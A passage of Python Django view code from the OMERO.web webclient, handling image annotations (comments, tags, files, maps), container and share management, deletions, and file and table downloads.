context["form_instrument_objectives"] = form_instrument_objectives
context["form_filters"] = form_filters
context["form_dichroics"] = form_dichroics
context["form_detectors"] = form_detectors
context["form_lasers"] = form_lasers
context["form_stageLabel"] = form_stageLabel
context["template"] = template
return context
@login_required()
@render_response()
def load_original_metadata(request, imageId, conn=None, share_id=None, **kwargs):
image = conn.getObject("Image", imageId)
if image is None:
raise Http404("No Image found with ID %s" % imageId)
context = {
"template": "webclient/annotations/original_metadata.html",
"imageId": image.getId(),
}
try:
om = image.loadOriginalMetadata()
if om is not None:
context["original_metadata"] = om[0]
context["global_metadata"] = om[1]
context["series_metadata"] = om[2]
except omero.LockTimeout:
# 408 is Request Timeout
return HttpResponse(content="LockTimeout", status=408)
return context
###########################################################################
# ACTIONS
# Annotation in the right-hand panel is handled the same way for single
# objects (metadata_general.html)
# AND for batch annotation (batch_annotate.html) by 4 forms:
# Comment (this is loaded in the initial page)
# Tags (the empty form is in the initial page but fields are loaded via AJAX)
# Local File (this is loaded in the initial page)
# Existing File (the empty form is in the initial page but field is loaded via
# AJAX)
#
# In each case, the form itself contains hidden fields to specify the
# object(s) being annotated
# All forms inherit from a single form that has these fields.
def getObjects(request, conn=None):
"""
Prepare objects for use in the annotation forms.
These objects are required by the form superclass to populate hidden
fields, so we know what we're annotating on submission
"""
r = request.GET or request.POST
images = (
len(r.getlist("image")) > 0
and list(conn.getObjects("Image", r.getlist("image")))
or list()
)
datasets = (
len(r.getlist("dataset")) > 0
and list(conn.getObjects("Dataset", r.getlist("dataset")))
or list()
)
projects = (
len(r.getlist("project")) > 0
and list(conn.getObjects("Project", r.getlist("project")))
or list()
)
screens = (
len(r.getlist("screen")) > 0
and list(conn.getObjects("Screen", r.getlist("screen")))
or list()
)
plates = (
len(r.getlist("plate")) > 0
and list(conn.getObjects("Plate", r.getlist("plate")))
or list()
)
acquisitions = (
len(r.getlist("acquisition")) > 0
and list(conn.getObjects("PlateAcquisition", r.getlist("acquisition")))
or list()
)
shares = (
len(r.getlist("share")) > 0 and [conn.getShare(r.getlist("share")[0])] or list()
)
wells = (
len(r.getlist("well")) > 0
and list(conn.getObjects("Well", r.getlist("well")))
or list()
)
return {
"image": images,
"dataset": datasets,
"project": projects,
"screen": screens,
"plate": plates,
"acquisition": acquisitions,
"well": wells,
"share": shares,
}
def getIds(request):
"""
Used by forms to indicate the currently selected objects prepared above
"""
r = request.GET or request.POST
selected = {
"images": r.getlist("image"),
"datasets": r.getlist("dataset"),
"projects": r.getlist("project"),
"screens": r.getlist("screen"),
"plates": r.getlist("plate"),
"acquisitions": r.getlist("acquisition"),
"wells": r.getlist("well"),
"shares": r.getlist("share"),
}
return selected
@login_required()
@render_response()
def batch_annotate(request, conn=None, **kwargs):
"""
This page gives a form for batch annotation.
Local File form and Comment form are loaded. Other forms are loaded via
AJAX
"""
objs = getObjects(request, conn)
# get groups for selected objects - setGroup() and create links
obj_ids = []
obj_labels = []
groupIds = set()
annotationBlocked = False
for key in objs:
obj_ids += ["%s=%s" % (key, o.id) for o in objs[key]]
for o in objs[key]:
groupIds.add(o.getDetails().group.id.val)
if not o.canAnnotate():
annotationBlocked = (
"Can't add annotations because you don't" " have permissions"
)
obj_labels.append({"type": key.title(), "id": o.id, "name": o.getName()})
obj_string = "&".join(obj_ids)
link_string = "|".join(obj_ids).replace("=", "-")
if len(groupIds) == 0:
# No supported objects found.
# If multiple tags / tagsets selected, return placeholder
if (
len(request.GET.getlist("tag")) > 0
or len(request.GET.getlist("tagset")) > 0
):
return HttpResponse("<h2>Can't batch annotate tags</h2>")
else:
return handlerInternalError(request, "No objects found")
groupId = list(groupIds)[0]
conn.SERVICE_OPTS.setOmeroGroup(groupId)
manager = BaseContainer(conn)
figScripts = manager.listFigureScripts(objs)
canExportAsJpg = manager.canExportAsJpg(request, objs)
filesetInfo = None
iids = []
if "image" in objs and len(objs["image"]) > 0:
iids = [i.getId() for i in objs["image"]]
if len(iids) > 0:
filesetInfo = conn.getFilesetFilesInfo(iids)
archivedInfo = conn.getArchivedFilesInfo(iids)
filesetInfo["count"] += archivedInfo["count"]
filesetInfo["size"] += archivedInfo["size"]
context = {
"iids": iids,
"obj_string": obj_string,
"link_string": link_string,
"obj_labels": obj_labels,
"batch_ann": True,
"figScripts": figScripts,
"canExportAsJpg": canExportAsJpg,
"filesetInfo": filesetInfo,
"annotationBlocked": annotationBlocked,
"differentGroups": False,
}
if len(groupIds) > 1:
context["annotationBlocked"] = (
"Can't add annotations because" " objects are in different groups"
)
context["differentGroups"] = True # E.g. don't run scripts etc
context["canDownload"] = manager.canDownload(objs)
context["template"] = "webclient/annotations/batch_annotate.html"
context["webclient_path"] = reverse("webindex")
context["annotationCounts"] = manager.getBatchAnnotationCounts(
getObjects(request, conn)
)
return context
@login_required()
@render_response()
def annotate_file(request, conn=None, **kwargs):
"""
On 'POST', This handles attaching an existing file-annotation(s) and/or
upload of a new file to one or more objects
Otherwise it generates the form for choosing file-annotations & local
files.
"""
oids = getObjects(request, conn)
selected = getIds(request)
initial = {
"selected": selected,
"images": oids["image"],
"datasets": oids["dataset"],
"projects": oids["project"],
"screens": oids["screen"],
"plates": oids["plate"],
"acquisitions": oids["acquisition"],
"wells": oids["well"],
}
# Use the first object we find to set context (assume all objects are in
# same group!)
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
obj_count = sum([len(selected[types]) for types in selected])
if obj_count == 0:
raise Http404("Need to specify objects via e.g. ?image=1")
# Get appropriate manager, either to list available Files to add to single
# object, or list ALL Files (multiple objects)
manager = None
if obj_count == 1:
for t in selected:
if len(selected[t]) > 0:
o_type = t[:-1] # "images" -> "image"
o_id = selected[t][0]
break
if o_type in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
if o_type == "tagset":
# TODO: this should be handled by the BaseContainer
o_type = "tag"
kw = {}
if o_type is not None and int(o_id) > 0:
kw[str(o_type)] = int(o_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
if manager is not None:
files = manager.getFilesByObject()
else:
manager = BaseContainer(conn)
for dtype, objs in oids.items():
if len(objs) > 0:
# NB: we only support a single data-type now. E.g. 'image' OR
# 'dataset' etc.
files = manager.getFilesByObject(
parent_type=dtype, parent_ids=[o.getId() for o in objs]
)
break
initial["files"] = files
if request.method == "POST":
# handle form submission
form_file = FilesAnnotationForm(initial=initial, data=request.POST.copy())
if form_file.is_valid():
# Link existing files...
files = form_file.cleaned_data["files"]
added_files = []
if files is not None and len(files) > 0:
added_files = manager.createAnnotationsLinks("file", files, oids)
# upload new file
fileupload = (
"annotation_file" in request.FILES
and request.FILES["annotation_file"]
or None
)
if fileupload is not None and fileupload != "":
newFileId = manager.createFileAnnotations(fileupload, oids)
added_files.append(newFileId)
return JsonResponse({"fileIds": added_files})
else:
return HttpResponse(form_file.errors)
else:
form_file = FilesAnnotationForm(initial=initial)
context = {"form_file": form_file}
template = "webclient/annotations/files_form.html"
context["template"] = template
return context
@login_required()
@render_response()
def annotate_rating(request, conn=None, **kwargs):
"""
Handle adding Rating to one or more objects
"""
if request.method != "POST":
raise Http404("Only POST supported")
rating = getIntOrDefault(request, "rating", 0)
oids = getObjects(request, conn)
# add / update rating
for otype, objs in oids.items():
for o in objs:
o.setRating(rating)
# return a summary of ratings
return JsonResponse({"success": True})
@login_required()
@render_response()
def annotate_comment(request, conn=None, **kwargs):
"""Handle adding Comments to one or more objects
Unbound instance of Comment form not available.
If the form has been submitted, a bound instance of the form
is created using request.POST"""
if request.method != "POST":
raise Http404("Unbound instance of form not available.")
oids = getObjects(request, conn)
selected = getIds(request)
initial = {
"selected": selected,
"images": oids["image"],
"datasets": oids["dataset"],
"projects": oids["project"],
"screens": oids["screen"],
"plates": oids["plate"],
"acquisitions": oids["acquisition"],
"wells": oids["well"],
"shares": oids["share"],
}
# Use the first object we find to set context (assume all objects are in
# same group!) this does not aplly to share
if len(oids["share"]) < 1:
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
# Handle form submission...
form_multi = CommentAnnotationForm(initial=initial, data=request.POST.copy())
if form_multi.is_valid():
# In each case below, we pass the {'object_type': [ids]} map
content = form_multi.cleaned_data["comment"]
if content is not None and content != "":
if oids["share"] is not None and len(oids["share"]) > 0:
sid = oids["share"][0].id
manager = BaseShare(conn, sid)
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])
),
int(conn.server_id),
)
textAnn = manager.addComment(host, content)
# For shares we need to return html for display...
context = {
"tann": textAnn,
"added_by": conn.getUserId(),
"template": "webclient/annotations/comment.html",
}
else:
# ...otherwise Comments are re-loaded by AJAX json
# so we don't *need* to return anything
manager = BaseContainer(conn)
annId = manager.createCommentAnnotations(content, oids)
context = {"annId": annId, "added_by": conn.getUserId()}
return context
else:
# TODO: handle invalid form error
return HttpResponse(str(form_multi.errors))
@login_required()
@render_response()
def annotate_map(request, conn=None, **kwargs):
"""
Handle adding Map Annotations to one or more objects
POST data "mapAnnotation" should be list of ['key':'value'] pairs.
"""
if request.method != "POST":
raise Http404(
"Need to POST map annotation data as list of" " ['key', 'value'] pairs"
)
oids = getObjects(request, conn)
# Use the first object we find to set context (assume all objects are in
# same group!)
# this does not aplly to share
if len(oids["share"]) < 1:
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
data = request.POST.get("mapAnnotation")
data = json.loads(data)
annIds = request.POST.getlist("annId")
ns = request.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
# Create a new annotation
if len(annIds) == 0 and len(data) > 0:
duplicate = request.POST.get("duplicate", "false")
duplicate.lower() == "true"
# For 'client' map annotations, we enforce 1 annotation per object
if ns == omero.constants.metadata.NSCLIENTMAPANNOTATION:
duplicate = True
if duplicate:
# Create a new Map Annotation for each object:
for k, objs in oids.items():
for obj in objs:
ann = omero.gateway.MapAnnotationWrapper(conn)
ann.setValue(data)
ann.setNs(ns)
ann.save()
annIds.append(ann.getId())
obj.linkAnnotation(ann)
else:
# Create single Map Annotation and link to all objects
ann = omero.gateway.MapAnnotationWrapper(conn)
ann.setValue(data)
ann.setNs(ns)
ann.save()
annIds.append(ann.getId())
for k, objs in oids.items():
for obj in objs:
obj.linkAnnotation(ann)
# Or update existing annotations
else:
for annId in annIds:
ann = conn.getObject("MapAnnotation", annId)
if ann is None:
continue
if len(data) > 0:
ann.setValue(data)
ann.save()
else:
# Delete if no data
handle = conn.deleteObjects("/Annotation", [annId])
try:
conn._waitOnCmd(handle)
finally:
handle.close()
if len(data) == 0:
annIds = None
return {"annId": annIds}
@login_required()
@render_response()
def marshal_tagging_form_data(request, conn=None, **kwargs):
"""
Provides json data to ome.tagging_form.js
"""
group = get_long_or_default(request, "group", -1)
conn.SERVICE_OPTS.setOmeroGroup(str(group))
try:
offset = int(request.GET.get("offset"))
limit = int(request.GET.get("limit", 1000))
except Exception:
offset = limit = None
jsonmode = request.GET.get("jsonmode")
if jsonmode == "tagcount":
tag_count = conn.getTagCount()
return dict(tag_count=tag_count)
manager = BaseContainer(conn)
manager.loadTagsRecursive(eid=-1, offset=offset, limit=limit)
all_tags = manager.tags_recursive
all_tags_owners = manager.tags_recursive_owners
if jsonmode == "tags":
# send tag information without descriptions
r = list((i, t, o, s) for i, d, t, o, s in all_tags)
return r
elif jsonmode == "desc":
# send descriptions for tags
return dict((i, d) for i, d, t, o, s in all_tags)
elif jsonmode == "owners":
# send owner information
return all_tags_owners
return HttpResponse()
@login_required()
@render_response()
def annotate_tags(request, conn=None, **kwargs):
"""
This handles creation AND submission of Tags form, adding new AND/OR
existing tags to one or more objects
"""
oids = getObjects(request, conn)
selected = getIds(request)
obj_count = sum([len(selected[types]) for types in selected])
# Get appropriate manager, either to list available Tags to add to single
# object, or list ALL Tags (multiple objects)
manager = None
self_id = conn.getEventContext().userId
tags = []
# Use the first object we find to set context (assume all objects are
# in same group!)
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
# Make a list of all current tags
# As would be on right column of tagging dialog...
taglist, users = tree.marshal_annotations(
conn,
project_ids=selected["projects"],
dataset_ids=selected["datasets"],
image_ids=selected["images"],
screen_ids=selected["screens"],
plate_ids=selected["plates"],
run_ids=selected["acquisitions"],
well_ids=selected["wells"],
ann_type="tag",
# If we reach this limit we'll get some tags not removed
limit=ANNOTATIONS_LIMIT,
)
userMap = {}
for exp in users:
userMap[exp["id"]] = exp
# For batch annotate, only include tags that user has added to all objects
if obj_count > 1:
# count my links
myLinkCount = {}
for t in taglist:
tid = t["id"]
if tid not in myLinkCount:
myLinkCount[tid] = 0
if t["link"]["owner"]["id"] == self_id:
myLinkCount[tid] += 1
# filter
taglist = [t for t in taglist if myLinkCount[t["id"]] == obj_count]
selected_tags = []
for tag in taglist:
linkOwnerId = tag["link"]["owner"]["id"]
owner = userMap[linkOwnerId]
ownerName = "%s %s" % (owner["firstName"], owner["lastName"])
canDelete = True
created = tag["link"]["date"]
linkOwned = linkOwnerId == self_id
selected_tags.append(
(tag["id"], self_id, ownerName, canDelete, created, linkOwned)
)
# selected_tags is really a list of tag LINKS.
# May be several links per tag.id
selected_tags.sort(key=lambda x: x[0])
initial = {
"selected": selected,
"images": oids["image"],
"datasets": oids["dataset"],
"projects": oids["project"],
"screens": oids["screen"],
"plates": oids["plate"],
"acquisitions": oids["acquisition"],
"wells": oids["well"],
}
if request.method == "POST":
# handle form submission
form_tags = TagsAnnotationForm(initial=initial, data=request.POST.copy())
newtags_formset = NewTagsAnnotationFormSet(
prefix="newtags", data=request.POST.copy()
)
# Create new tags or Link existing tags...
if form_tags.is_valid() and newtags_formset.is_valid():
# filter down previously selected tags to the ones linked by
# current user
selected_tag_ids = [stag[0] for stag in selected_tags if stag[5]]
# Remove duplicates from tag IDs
selected_tag_ids = list(set(selected_tag_ids))
post_tags = list(form_tags.cleaned_data["tags"])
tags = [tag for tag in post_tags if tag not in selected_tag_ids]
removed = [tag for tag in selected_tag_ids if tag not in post_tags]
manager = BaseContainer(conn)
if tags:
manager.createAnnotationsLinks("tag", tags, oids)
new_tags = []
for form in newtags_formset.forms:
new_tags.append(
manager.createTagAnnotations(
form.cleaned_data["tag"],
form.cleaned_data["description"],
oids,
tag_group_id=form.cleaned_data["tagset"],
)
)
# only remove Tags where the link is owned by self_id
for remove in removed:
tag_manager = BaseContainer(conn, tag=remove)
tag_manager.remove(
[
"%s-%s" % (dtype, obj.id)
for dtype, objs in oids.items()
for obj in objs
],
tag_owner_id=self_id,
)
return JsonResponse({"added": tags, "removed": removed, "new": new_tags})
else:
# TODO: handle invalid form error
return HttpResponse(str(form_tags.errors))
else:
form_tags = TagsAnnotationForm(initial=initial)
newtags_formset = NewTagsAnnotationFormSet(prefix="newtags")
context = {
"form_tags": form_tags,
"newtags_formset": newtags_formset,
"selected_tags": selected_tags,
}
template = "webclient/annotations/tags_form.html"
context["template"] = template
return context
@require_POST
@login_required()
@render_response()
def edit_channel_names(request, imageId, conn=None, **kwargs):
"""
Edit and save channel names
"""
image = conn.getObject("Image", imageId)
sizeC = image.getSizeC()
channelNames = {}
nameDict = {}
for i in range(sizeC):
cname = request.POST.get("channel%d" % i, None)
if cname is not None:
cname = smart_str(cname)[:255] # Truncate to fit in DB
channelNames["channel%d" % i] = cname
nameDict[i + 1] = cname
# If the 'Apply to Dataset' button was used to submit...
if request.POST.get("confirm_apply", None) is not None:
# plate-123 OR dataset-234
parentId = request.POST.get("parentId", None)
if parentId is not None:
ptype = parentId.split("-")[0].title()
pid = long(parentId.split("-")[1])
counts = conn.setChannelNames(ptype, [pid], nameDict, channelCount=sizeC)
else:
counts = conn.setChannelNames("Image", [image.getId()], nameDict)
rv = {"channelNames": channelNames}
if counts:
rv["imageCount"] = counts["imageCount"]
rv["updateCount"] = counts["updateCount"]
return rv
else:
return {"error": "No parent found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def manage_action_containers(
request, action, o_type=None, o_id=None, conn=None, **kwargs
):
"""
Handles many different actions on various objects.
@param action: "addnewcontainer", (creates a new Project, Dataset,
Screen), "editname", "savename", "editdescription",
"savedescription", (used as GET and POST for in-line
editing),
"removefromshare", (tree P/D/I moving etc)
"delete", "deletemany" (delete objects)
"remove" (remove tag/comment from object)
@param o_type: "dataset", "project", "image", "screen", "plate",
"acquisition", "well","comment", "file", "tag",
"tagset","share", "sharecomment"
"""
template = None
manager = None
if o_type in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
kw = {}
if o_type is not None and int(o_id) > 0:
o_id = int(o_id)
kw[str(o_type)] = o_id
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
elif o_type in ("share", "sharecomment", "chat"):
manager = BaseShare(conn, o_id)
else:
manager = BaseContainer(conn)
form = None
if action == "addnewcontainer":
# Used within the jsTree to add a new Project, Dataset, Tag,
# Tagset etc under a specified parent OR top-level
if not request.method == "POST":
return JsonResponse(
{"Error": "Must use POST to create container"}, status=405
)
form = ContainerForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Create new in %s: %s" % (o_type, str(form.cleaned_data)))
name = form.cleaned_data["name"]
description = form.cleaned_data["description"]
owner = form.cleaned_data["owner"]
if o_type == "project" and hasattr(manager, o_type) and o_id > 0:
oid = manager.createDataset(name, description, owner=owner)
elif o_type == "tagset" and o_id > 0:
oid = manager.createTag(name, description, owner=owner)
elif request.POST.get("folder_type") in (
"project",
"screen",
"dataset",
"tag",
"tagset",
):
# No parent specified. We can create orphaned 'project',
# 'dataset' etc.
folder_type = request.POST.get("folder_type")
if folder_type == "dataset":
oid = manager.createDataset(
name,
description,
owner=owner,
img_ids=request.POST.getlist("image", None),
)
else:
oid = conn.createContainer(
folder_type, name, description, owner=owner
)
else:
return HttpResponseServerError("Object does not exist")
rdict = {"bad": "false", "id": oid}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
elif action == "add":
template = "webclient/public/share_form.html"
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
if o_type == "share":
img_ids = request.GET.getlist("image", request.POST.getlist("image"))
if request.method == "GET" and len(img_ids) == 0:
return HttpResponse("No images specified")
images_to_share = list(conn.getObjects("Image", img_ids))
if request.method == "POST":
form = BasketShareForm(
initial={"experimenters": experimenters, "images": images_to_share},
data=request.POST.copy(),
)
if form.is_valid():
images = form.cleaned_data["image"]
message = form.cleaned_data["message"]
expiration = form.cleaned_data["expiration"]
members = form.cleaned_data["members"]
# guests = request.POST['guests']
enable = form.cleaned_data["enable"]
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])
),
int(conn.server_id),
)
shareId = manager.createShare(
host, images, message, members, enable, expiration
)
return HttpResponse("shareId:%s" % shareId)
else:
initial = {
"experimenters": experimenters,
"images": images_to_share,
"enable": True,
"selected": request.GET.getlist("image"),
}
form = BasketShareForm(initial=initial)
template = "webclient/public/share_form.html"
context = {"manager": manager, "form": form}
elif action == "edit":
# form for editing Shares only
if o_id is None:
raise Http404("No share ID")
if o_type == "share" and int(o_id) > 0:
template = "webclient/public/share_form.html"
manager.getMembers(o_id)
manager.getComments(o_id)
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
initial = {
"message": manager.share.message,
"expiration": "",
"shareMembers": manager.membersInShare,
"enable": manager.share.active,
"experimenters": experimenters,
}
if manager.share.getExpireDate() is not None:
initial["expiration"] = manager.share.getExpireDate().strftime(
"%Y-%m-%d"
)
form = ShareForm(initial=initial) # 'guests':share.guestsInShare,
context = {"manager": manager, "form": form}
elif action == "save":
# Handles submission of the 'edit' form above. TODO: not used now?
if not request.method == "POST":
return HttpResponseRedirect(
reverse("manage_action_containers", args=["edit", o_type, o_id])
)
if o_type == "share":
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
form = ShareForm(
initial={"experimenters": experimenters}, data=request.POST.copy()
)
if form.is_valid():
logger.debug("Update share: %s" % (str(form.cleaned_data)))
message = form.cleaned_data["message"]
expiration = form.cleaned_data["expiration"]
members = form.cleaned_data["members"]
# guests = request.POST['guests']
enable = form.cleaned_data["enable"]
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])
),
int(conn.server_id),
)
manager.updateShareOrDiscussion(
host, message, members, enable, expiration
)
r = "enable" if enable else "disable"
return HttpResponse(r)
else:
template = "webclient/public/share_form.html"
context = {"share": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "editname":
# start editing 'name' in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
if o_type == "tag":
txtValue = obj.textValue
else:
txtValue = obj.getName()
form = ContainerNameForm(initial={"name": txtValue})
context = {"manager": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "savename":
# Save name edit in-line
if not request.method == "POST":
return HttpResponseRedirect(
reverse("manage_action_containers", args=["edit", o_type, o_id])
)
if hasattr(manager, o_type) and o_id > 0:
form = ContainerNameForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
name = form.cleaned_data["name"]
rdict = {"bad": "false", "o_type": o_type}
manager.updateName(o_type, name)
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == "editdescription":
# start editing description in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
form = ContainerDescriptionForm(initial={"description": obj.description})
context = {"manager": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "savedescription":
# Save editing of description in-line
if not request.method == "POST":
return HttpResponseServerError(
"Action '%s' on the '%s' id:%s cannot be complited"
% (action, o_type, o_id)
)
if hasattr(manager, o_type) and o_id > 0:
form = ContainerDescriptionForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
description = form.cleaned_data["description"]
manager.updateDescription(o_type, description)
rdict = {"bad": "false"}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == "remove":
# Handles removal of comment, tag from
# Object etc.
# E.g. image-123 or image-1|image-2
parents = request.POST["parent"]
try:
manager.remove(parents.split("|"))
except Exception as x:
logger.error(traceback.format_exc())
rdict = {"bad": "true", "errs": str(x)}
return JsonResponse(rdict)
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "removefromshare":
image_id = request.POST.get("source")
try:
manager.removeImage(image_id)
except Exception as x:
logger.error(traceback.format_exc())
rdict = {"bad": "true", "errs": str(x)}
return JsonResponse(rdict)
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "delete":
# Handles delete of a file attached to object.
child = toBoolean(request.POST.get("child"))
anns = toBoolean(request.POST.get("anns"))
try:
handle = manager.deleteItem(child, anns)
request.session["callback"][str(handle)] = {
"job_type": "delete",
"delmany": False,
"did": o_id,
"dtype": o_type,
"status": "in progress",
"error": 0,
"dreport": _formatReport(handle),
"start_time": datetime.datetime.now(),
}
request.session.modified = True
except Exception as x:
logger.error(
"Failed to delete: %r" % {"did": o_id, "dtype": o_type}, exc_info=True
)
rdict = {"bad": "true", "errs": str(x)}
else:
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "deletemany":
# Handles multi-delete from jsTree.
object_ids = {
"Image": request.POST.getlist("image"),
"Dataset": request.POST.getlist("dataset"),
"Project": request.POST.getlist("project"),
"Annotation": request.POST.getlist("tag"),
"Screen": request.POST.getlist("screen"),
"Plate": request.POST.getlist("plate"),
"Well": request.POST.getlist("well"),
"PlateAcquisition": request.POST.getlist("acquisition"),
}
child = toBoolean(request.POST.get("child"))
anns = toBoolean(request.POST.get("anns"))
logger.debug(
"Delete many: child? %s anns? %s object_ids %s" % (child, anns, object_ids)
)
try:
for key, ids in object_ids.items():
if ids is not None and len(ids) > 0:
handle = manager.deleteObjects(key, ids, child, anns)
if key == "PlateAcquisition":
key = "Plate Run" # for nicer user message
dMap = {
"job_type": "delete",
"start_time": datetime.datetime.now(),
"status": "in progress",
"error": 0,
"dreport": _formatReport(handle),
"dtype": key,
}
if len(ids) > 1:
dMap["delmany"] = len(ids)
dMap["did"] = ids
else:
dMap["delmany"] = False
dMap["did"] = ids[0]
request.session["callback"][str(handle)] = dMap
request.session.modified = True
except Exception:
logger.error(
"Failed to delete: %r" % {"did": ids, "dtype": key}, exc_info=True
)
# Ajax error handling will allow user to submit bug report
raise
else:
rdict = {"bad": "false"}
return JsonResponse(rdict)
context["template"] = template
return context
@login_required(doConnectionCleanup=False)
def get_original_file(request, fileId, download=False, conn=None, **kwargs):
"""
Returns the specified original file as an http response. Used for
displaying text or png/jpeg etc files in browser
"""
# May be viewing results of a script run in a different group.
conn.SERVICE_OPTS.setOmeroGroup(-1)
orig_file = conn.getObject("OriginalFile", fileId)
if orig_file is None:
return handlerInternalError(
request, "Original File does not exist (id:%s)." % (fileId)
)
rsp = ConnCleaningHttpResponse(orig_file.getFileInChunks(buf=settings.CHUNK_SIZE))
rsp.conn = conn
mimetype = orig_file.mimetype
if mimetype == "text/x-python":
mimetype = "text/plain" # allows display in browser
rsp["Content-Type"] = mimetype
rsp["Content-Length"] = orig_file.getSize()
if download:
downloadName = orig_file.name.replace(" ", "_")
downloadName = downloadName.replace(",", ".")
rsp["Content-Disposition"] = "attachment; filename=%s" % downloadName
return rsp
@login_required(doConnectionCleanup=False)
@render_response()
def omero_table(request, file_id, mtype=None, conn=None, **kwargs):
"""
Download OMERO.table as CSV (streaming response) or return as HTML or json
@param file_id: OriginalFile ID
@param mtype: None for html table or 'csv' or 'json'
@param conn: BlitzGateway connection
"""
query = request.GET.get("query", "*")
offset = get_long_or_default(request, "offset", 0)
limit = get_long_or_default(request, "limit", settings.PAGE)
iviewer_url = None
try:
iviewer_url = reverse("omero_iviewer_index")
except NoReverseMatch:
pass
# Check if file exists since _table_query() doesn't check
file_id = long(file_id)
orig_file = conn.getObject("OriginalFile", file_id)
if orig_file is None:
raise Http404("OriginalFile %s not found" % file_id)
lazy = mtype == "csv"
context = webgateway_views._table_query(
request, file_id, conn=conn, query=query, offset=offset, limit=limit, lazy=lazy
)
if context.get("error") or not context.get("data"):
return JsonResponse(context)
# OR, return as csv or html
if mtype == "csv":
table_data = context.get("data")
def csv_gen():
csv_cols = ",".join(table_data.get("columns"))
yield csv_cols
for rows in table_data.get("lazy_rows"):
yield (
"\n" + "\n".join([",".join([str(d) for d in row]) for row in rows])
)
downloadName = orig_file.name.replace(" ", "_").replace(",", ".")
downloadName = downloadName + ".csv"
rsp = TableClosingHttpResponse(csv_gen(), content_type="text/csv")
rsp.conn = conn
rsp.table = context.get("table")
rsp["Content-Type"] = "application/force-download"
# rsp['Content-Length'] = ann.getFileSize()
rsp["Content-Disposition"] = "attachment; filename=%s" % downloadName
return rsp
context["data"]["name"] = orig_file.name
context["data"]["path"] = orig_file.path
context["data"]["id"] = file_id
context["meta"]["query"] = query
# check if offset matches an integer page number:
if offset == 0 or offset / limit == offset // limit:
context["meta"]["page"] = (offset // limit) + 1 if offset > 0 else 1
# pagination links
url = reverse("omero_table", args=[file_id])
context["meta"]["url"] = url
url += "?limit=%s" % limit
if query != "*":
url += "&query=%s" % query
if (offset + limit) < context["meta"]["totalCount"]:
context["meta"]["next"] = url + "&offset=%s" % (offset + limit)
if offset > 0:
context["meta"]["prev"] = url + "&offset=%s" % (max(0, offset - limit))
# by default, return context as JSON data
if mtype is None:
context["template"] = "webclient/annotations/omero_table.html"
context["iviewer_url"] = iviewer_url
col_types = context["data"]["column_types"]
if "ImageColumn" in col_types:
context["image_column_index"] = col_types.index("ImageColumn")
if "WellColumn" in col_types:
context["well_column_index"] = col_types.index("WellColumn")
if "RoiColumn" in col_types:
context["roi_column_index"] = col_types.index("RoiColumn")
# provide example queries - pick first DoubleColumn...
for idx, c_type in enumerate(col_types):
if c_type in ("DoubleColumn", "LongColumn"):
col_name = context["data"]["columns"][idx]
# find first few non-empty cells...
vals = []
for row in context["data"]["rows"]:
if row[idx]:
vals.append(row[idx])
if len(vals) > 3:
break
if " " in col_name or len(vals) < 2:
# Don't support queries on columns with spaces
continue
context["example_column"] = col_name
context["example_min_value"] = min(vals)
context["example_max_value"] = max(vals)
break
return context
@login_required(doConnectionCleanup=False)
def download_annotation(request, annId, conn=None, **kwargs):
""" Returns the file annotation as an http response for download """
ann = conn.getObject("FileAnnotation", annId)
if ann is None:
return handlerInternalError(
request, "FileAnnotation does not exist (id:%s)." % (annId)
)
rsp = ConnCleaningHttpResponse(ann.getFileInChunks(buf=settings.CHUNK_SIZE))
rsp.conn = conn
rsp["Content-Type"] = "application/force-download"
rsp["Content-Length"] = ann.getFileSize()
rsp["Content-Disposition"] = "attachment; filename=%s" % (
ann.getFileName().replace(" ", "_")
)
return rsp
@login_required()
def download_orig_metadata(request, imageId, conn=None, **kwargs):
""" Downloads the 'Original Metadata' as a text file """
image = conn.getObject("Image", imageId)
if image is None:
